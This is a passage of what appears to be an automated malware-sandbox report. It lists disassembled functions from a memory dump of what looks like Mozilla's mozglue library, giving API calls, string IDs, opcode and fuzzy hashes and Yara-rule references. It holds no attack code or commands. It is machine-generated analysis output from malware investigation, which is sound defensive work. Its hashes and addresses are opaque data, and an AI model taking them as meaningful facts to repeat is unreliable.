                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFBCA2E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFBCAA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                      • String ID: (null)$0
                                                                                                      • API String ID: 4074790623-38302674
                                                                                                      • Opcode ID: 6ebbd1a1a70ef19df62a7ba4366170af2fcdd8c55318421366711d3891033363
                                                                                                      • Instruction ID: 18f86304fe5436f3da7f1db2cb132609a598d2290706cd10e894347acb60ab4c
                                                                                                      • Opcode Fuzzy Hash: 6ebbd1a1a70ef19df62a7ba4366170af2fcdd8c55318421366711d3891033363
                                                                                                      • Instruction Fuzzy Hash: C4A1AE316093429FDB00DF2AC994B5FBBF5AF89748F18882DE899E7641D731D805CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF93480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF93492
                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF934A9
                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF934EF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CF9350E
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CF93522
                                                                                                      • __aulldiv.LIBCMT ref: 6CF93552
                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF9357C
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF93592
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                      • API String ID: 3634367004-706389432
                                                                                                      • Opcode ID: 8884626a29ecd83c4df1b109e78bef1cfdf5d07c84d3d422abf76fe8aede10d7
                                                                                                      • Instruction ID: 77f1a13264b9205a798423c425f8fa4575e7620d0303704661bbaaa143698b98
                                                                                                      • Opcode Fuzzy Hash: 8884626a29ecd83c4df1b109e78bef1cfdf5d07c84d3d422abf76fe8aede10d7
                                                                                                      • Instruction Fuzzy Hash: 5A317376A012069BEF04DFF5CC49BAE7BB9FB4A304F104019E569E3750DB74A904CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF94480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$moz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3009372454-0
                                                                                                      • Opcode ID: 34b438c0dc358c82ba356473e0d06c3cb4541050e660822e310d8b18069b60ef
                                                                                                      • Instruction ID: a9b5f115bb6ff97d63be70b042a0d96b8f8c33ff28429d8d145df0d182dffeaa
                                                                                                      • Opcode Fuzzy Hash: 34b438c0dc358c82ba356473e0d06c3cb4541050e660822e310d8b18069b60ef
                                                                                                      • Instruction Fuzzy Hash: 9DB1F672A001108FEF18DE7CDC9476E7BB1AF52328F184669E436DBBD2D73198448B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFFAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                      • String ID:
                                                                                                      • API String ID: 1192971331-0
                                                                                                      • Opcode ID: 274bb30494294e3b54282f6e97cd95f334d5f891de0325f9d89898c0c0bc7cc3
                                                                                                      • Instruction ID: 1d217e5ede527104e99a6607ee4b1c531e99c1591d8d3301a0625d6c7c9fb060
                                                                                                      • Opcode Fuzzy Hash: 274bb30494294e3b54282f6e97cd95f334d5f891de0325f9d89898c0c0bc7cc3
                                                                                                      • Instruction Fuzzy Hash: 5D313DB19047058FDB00AFB9DA4936EBBF0FF85305F01492DE9A597311EB709499CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CFA9675
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA9697
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CFA96E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CFA9707
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA971F
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9773
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CFA97B7
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97D0
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97EB
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9824
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                      • API String ID: 409848716-3880535382
                                                                                                      • Opcode ID: c932b317435db4e704d36797eb68045e62979a3cad545f4c99542015a0b80aac
                                                                                                      • Instruction ID: 6c62da2bbcef12d3aac049f4e207df8f2b5a890818fa2594820c21f4f0921cf2
                                                                                                      • Opcode Fuzzy Hash: c932b317435db4e704d36797eb68045e62979a3cad545f4c99542015a0b80aac
                                                                                                      • Instruction Fuzzy Hash: 2241B576604205DBDF00CFE5DC85B9ABBB8FB4A314F104229ED2997781DB31E915CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF91E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF91EC1
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF91EE1
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E744), ref: 6CF91F38
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E744), ref: 6CF91F5C
                                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CF91F83
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF91FC0
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF91FE2
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF91FF6
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF92019
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                      • String ID: MOZ_CRASH()
                                                                                                      • API String ID: 2055633661-2608361144
                                                                                                      • Opcode ID: 95a8d640fb7cfa9ca1bb3735aeadd4c0599cdf68f831d648d860130e4f85a6ab
                                                                                                      • Instruction ID: d7d6ac7c2c9c3fecfb149cbe8e924ba78267e956f47e318fb99da378f4293beb
                                                                                                      • Opcode Fuzzy Hash: 95a8d640fb7cfa9ca1bb3735aeadd4c0599cdf68f831d648d860130e4f85a6ab
                                                                                                      • Instruction Fuzzy Hash: A741C375A0431A8BFF009FE8CC89B6E3AB9FB4A348F044239E925D7745D7719804CB96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFA7EA7
                                                                                                      • malloc.MOZGLUE(00000001), ref: 6CFA7EB3
                                                                                                        • Part of subcall function 6CFACAB0: EnterCriticalSection.KERNEL32(?), ref: 6CFACB49
                                                                                                        • Part of subcall function 6CFACAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CFACBB6
                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CFA7EC4
                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6CFA7F19
                                                                                                      • malloc.MOZGLUE(?), ref: 6CFA7F36
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFA7F4D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                      • String ID: d
                                                                                                      • API String ID: 204725295-2564639436
                                                                                                      • Opcode ID: fa337ca846e5ca606c67e8ce7b3bd30ce63c6d4e3b3f2d914861f8f864747fe8
                                                                                                      • Instruction ID: 8ab2aed63403cbb7b2496bcd1ed47525acfde30b008f7b1467a87da933831277
                                                                                                      • Opcode Fuzzy Hash: fa337ca846e5ca606c67e8ce7b3bd30ce63c6d4e3b3f2d914861f8f864747fe8
                                                                                                      • Instruction Fuzzy Hash: 26311A61D0434897EB019B68CC04AFEB778EF95208F055229ED5997612FB31A6C5C3A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL ref: 6CFA3EEE
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CFA3FDC
                                                                                                      • RtlAllocateHeap.NTDLL ref: 6CFA4006
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CFA40A1
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CFA3CCC), ref: 6CFA40AF
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CFA3CCC), ref: 6CFA40C2
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CFA4134
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CFA3CCC), ref: 6CFA4143
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CFA3CCC), ref: 6CFA4157
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                      • String ID:
                                                                                                      • API String ID: 3680524765-0
                                                                                                      • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                      • Instruction ID: 8443dd39bb46f5796b5fcd02b4c31f598f97145c80c727557ff6f3a9cfe69445
                                                                                                      • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                      • Instruction Fuzzy Hash: 59A17FB1A00215CFEB44CF69C88075AFBB5FF48318F258199D909AF752D771E886CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFE8273), ref: 6CFE9D65
                                                                                                      • free.MOZGLUE(6CFE8273,?), ref: 6CFE9D7C
                                                                                                      • free.MOZGLUE(?,?), ref: 6CFE9D92
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CFE9E0F
                                                                                                      • free.MOZGLUE(6CFE946B,?,?), ref: 6CFE9E24
                                                                                                      • free.MOZGLUE(?,?,?), ref: 6CFE9E3A
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CFE9EC8
                                                                                                      • free.MOZGLUE(6CFE946B,?,?,?), ref: 6CFE9EDF
                                                                                                      • free.MOZGLUE(?,?,?,?), ref: 6CFE9EF5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                      • String ID:
                                                                                                      • API String ID: 956590011-0
                                                                                                      • Opcode ID: 958e72fcbac1412ca2509400764c1b3c41db1c4cb63ef88cc0691d5709c2530f
                                                                                                      • Instruction ID: ae6e617ad0a482461e419d727be5f40657dd3d8a4720a0a4637707aa687e86bc
                                                                                                      • Opcode Fuzzy Hash: 958e72fcbac1412ca2509400764c1b3c41db1c4cb63ef88cc0691d5709c2530f
                                                                                                      • Instruction Fuzzy Hash: 3371A0B0909B419BC712CF19C48059BF3F5FF99315B44861DE99A6BB01EB30F985CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFEDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CFEDDCF
                                                                                                        • Part of subcall function 6CFCFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFCFA4B
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE90FF
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE9108
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDE0D
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFEDE41
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDE5F
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDEA3
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDEE9
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CFDDEFD,?,6CFA4A68), ref: 6CFEDF32
                                                                                                        • Part of subcall function 6CFEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CFEDB86
                                                                                                        • Part of subcall function 6CFEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CFEDC0E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CFDDEFD,?,6CFA4A68), ref: 6CFEDF65
                                                                                                      • free.MOZGLUE(?), ref: 6CFEDF80
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 112305417-0
                                                                                                      • Opcode ID: 8c3b77ae16c643924ddd8dd0ed5329d9f9463edb7530b923c1496e9588448c60
                                                                                                      • Instruction ID: 3c3ca2f35507240a4d85e87d71e592e623647d25271192a69d451653a1801a8b
                                                                                                      • Opcode Fuzzy Hash: 8c3b77ae16c643924ddd8dd0ed5329d9f9463edb7530b923c1496e9588448c60
                                                                                                      • Instruction Fuzzy Hash: 7451A176601711ABD721CB28C8847EFB3B6AFD9308F950529D91A63F00DB31F919CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D32
                                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D62
                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D6D
                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D84
                                                                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5DA4
                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5DC9
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6CFF5DDB
                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5E00
                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5E45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 2325513730-0
                                                                                                      • Opcode ID: 24faa4ed1e798f7c611909c9eb02133fd1a139b6d2b4e669bba56927a0e68986
                                                                                                      • Instruction ID: 9b15d53d930a7350ac3298ce1f86afee1d9c89cb13b546a10c7c9f3eac825231
                                                                                                      • Opcode Fuzzy Hash: 24faa4ed1e798f7c611909c9eb02133fd1a139b6d2b4e669bba56927a0e68986
                                                                                                      • Instruction Fuzzy Hash: 9541AF34A043059FDB04DFA5C899BAE7BB5EF89314F144028E52697791EB30D806CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFCCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CF931A7), ref: 6CFCCDDD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
